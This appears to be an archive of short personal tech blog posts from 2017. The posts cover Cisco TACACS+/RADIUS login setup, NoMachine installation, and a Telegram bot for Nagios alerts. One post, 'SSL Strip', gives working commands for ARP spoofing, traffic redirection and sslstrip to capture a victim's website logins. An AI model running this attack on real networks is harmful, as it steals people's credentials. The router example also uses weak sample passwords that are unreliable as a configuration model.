Saturday, July 8, 2017

Configure Authentication With TACACS and Radius

Configure Authentication With TACACS and Radius

Diagram
1. On PC


2. On Server TACACS+

3. On Server Radius

4. On Router, R1

configure terminal
hostname R1

interface GigabitEthernet0/0
ip address 192.168.2.1 255.255.255.0
no sh

interface GigabitEthernet0/1
ip address 192.168.1.1 255.255.255.0
no sh


ip domain-name cisco.com
username admin pass cisco
crypto key generate rsa 
1024

enable secret cisco

line vty 0 4
login authentication AUTH
transport input ssh
privilege level 15


aaa new-model
aaa authentication login AUTH group tacacs+ group radius local
tacacs-server host 192.168.1.2
tacacs-server key TACACS123

radius-server host 192.168.1.3
radius-server key RADIUS123


Wednesday, March 22, 2017

SSL Strip

SSL Strip

Diagram:

On KALI Machine

* Open a Terminal
netdiscover

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j  REDIRECT --to-port 8080

arpspoof -i eth0 -t 10.10.1.55 -r 10.10.1.111

* Open another Terminal
sslstrip -l 8080

Once the Victim Machine access to any login website such as, Facebook, Gmail, Yahoo, we will be able to see the login name and password that store on the file sslstrip.log on Kali.

* Open another Terminal
cat sslstrip.log to see the name and password.

Monday, February 20, 2017

Install NoMachine

Install NoMachine

Install NoMachine remote desktop to Kali.

1. On Window PC
Download and install NoMachine
https://www.nomachine.com/download/download&id=17


2. On KALI
Downlaod and install NoMachine
cd ~/Downloads
https://www.nomachine.com/download/download&id=3

dpkg -i nomachine_5.2.11_1_amd64.deb

3. Start NoMachine
Start NoMachine on Windows PC and connect to Kali











Wednesday, January 4, 2017

Create Telegram Bot

Create Telegram Bot


1. Search: BotFather (@BotFather)
/newbot

vnkk001_bot

After create the new bot we will got API similar the below format:
Use this token to access the HTTP API:
1122334455:AAbbCCddEEff1122334455

/setdescription

/setjointgroups

Check the API Info:
https://api.telegram.org/bot1122334455:AAbbCCddEEff1122334455/getme

Check the API Chat:
https://api.telegram.org/bot1122334455:AAbbCCddEEff1122334455/getupdates

Chat from Broswer:
https://api.telegram.org/bot1122334455:AAbbCCddEEff1122334455/sendmessage?chat_id=154066828&text=TestMSG001

Why need to have BOT?
You can create as many BOT as you want and make it work for you as our robot.

In my case I create one to alert me once something went wrong,
I integrated with Nagios with the bot API as mentions above.

1. Create new bot, I named it:  Nagios_Alert

2. Add bot to a group (what ever you want and add other member as you want to)

3. Integrated with Nagios, by send the message as bot user to post the message,

So all the members will see the message in the group.